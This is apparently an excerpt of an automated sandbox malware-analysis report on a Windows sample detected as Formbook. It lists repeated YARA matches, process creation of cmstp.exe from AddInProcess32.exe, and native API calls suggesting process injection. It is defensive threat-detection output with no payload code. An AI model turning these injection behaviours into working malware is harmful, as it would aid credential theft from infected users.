          Source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large array initializationsShow sources
          Source: 583475.exe, m1DY/f0L8.csLarge array initialization: .cctor: array initializer size 4946
          Source: 583475.exe, Zp0/e6J.csLarge array initialization: .cctor: array initializer size 2762
          Source: 583475.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exeJump to behavior
          Source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_02AB72880_2_02AB7288
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_02AB77200_2_02AB7720
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C16680_2_067C1668
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C35D80_2_067C35D8
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C82F00_2_067C82F0
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C4F280_2_067C4F28
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C67800_2_067C6780
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067CE5200_2_067CE520
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067CE5100_2_067CE510
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C23500_2_067C2350
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C60DB0_2_067C60DB
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067CEAD00_2_067CEAD0
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067CEAC00_2_067CEAC0
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C8BA00_2_067C8BA0
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C8B990_2_067C8B99
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004010307_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041C9127_2_0041C912
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041BBD87_2_0041BBD8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00408C707_2_00408C70
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00402D907_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041BE0F7_2_0041BE0F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00402FB07_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_008920507_2_00892050
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01310D207_2_01310D20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013341207_2_01334120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131F9007_2_0131F900
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E2D077_2_013E2D07
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E1D557_2_013E1D55
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013425817_2_01342581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132D5E07_2_0132D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132841F7_2_0132841F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D10027_2_013D1002
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A07_2_013420A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E20A87_2_013E20A8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132B0907_2_0132B090
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E2B287_2_013E2B28
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134EBB07_2_0134EBB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E1FF17_2_013E1FF1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013DDBD27_2_013DDBD2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01336E307_2_01336E30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E22AE7_2_013E22AE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E2EF77_2_013E2EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B09017_2_04E4B090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF100217_2_04EF1002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4841F17_2_04E4841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4D5E017_2_04E4D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6258117_2_04E62581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F01D5517_2_04F01D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E30D2017_2_04E30D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5412017_2_04E54120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3F90017_2_04E3F900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E56E3017_2_04E56E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6EBB017_2_04E6EBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAC91217_2_02FAC912
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02F92FB017_2_02F92FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02F98C7017_2_02F98C70
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02F92D9017_2_02F92D90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0131B150 appears 35 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 04E3B150 appears 32 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004185D0 NtCreateFile,7_2_004185D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00418680 NtReadFile,7_2_00418680
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00418700 NtClose,7_2_00418700
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004187B0 NtAllocateVirtualMemory,7_2_004187B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004185CA NtCreateFile,7_2_004185CA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041867A NtReadFile,7_2_0041867A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004186FA NtReadFile,NtClose,7_2_004186FA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_01359910
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359540 NtReadFile,LdrInitializeThunk,7_2_01359540
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013599A0 NtCreateSection,LdrInitializeThunk,7_2_013599A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013595D0 NtClose,LdrInitializeThunk,7_2_013595D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359860 NtQuerySystemInformation,LdrInitializeThunk,7_2_01359860
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359840 NtDelayExecution,LdrInitializeThunk,7_2_01359840
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013598F0 NtReadVirtualMemory,LdrInitializeThunk,7_2_013598F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359710 NtQueryInformationToken,LdrInitializeThunk,7_2_01359710
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013597A0 NtUnmapViewOfSection,LdrInitializeThunk,7_2_013597A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359780 NtMapViewOfSection,LdrInitializeThunk,7_2_01359780
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359FE0 NtCreateMutant,LdrInitializeThunk,7_2_01359FE0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359A20 NtResumeThread,LdrInitializeThunk,7_2_01359A20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359A00 NtProtectVirtualMemory,LdrInitializeThunk,7_2_01359A00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_01359660
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359A50 NtCreateFile,LdrInitializeThunk,7_2_01359A50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013596E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_013596E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0135AD30 NtSetContextThread,7_2_0135AD30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359520 NtWaitForSingleObject,7_2_01359520
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359560 NtWriteFile,7_2_01359560
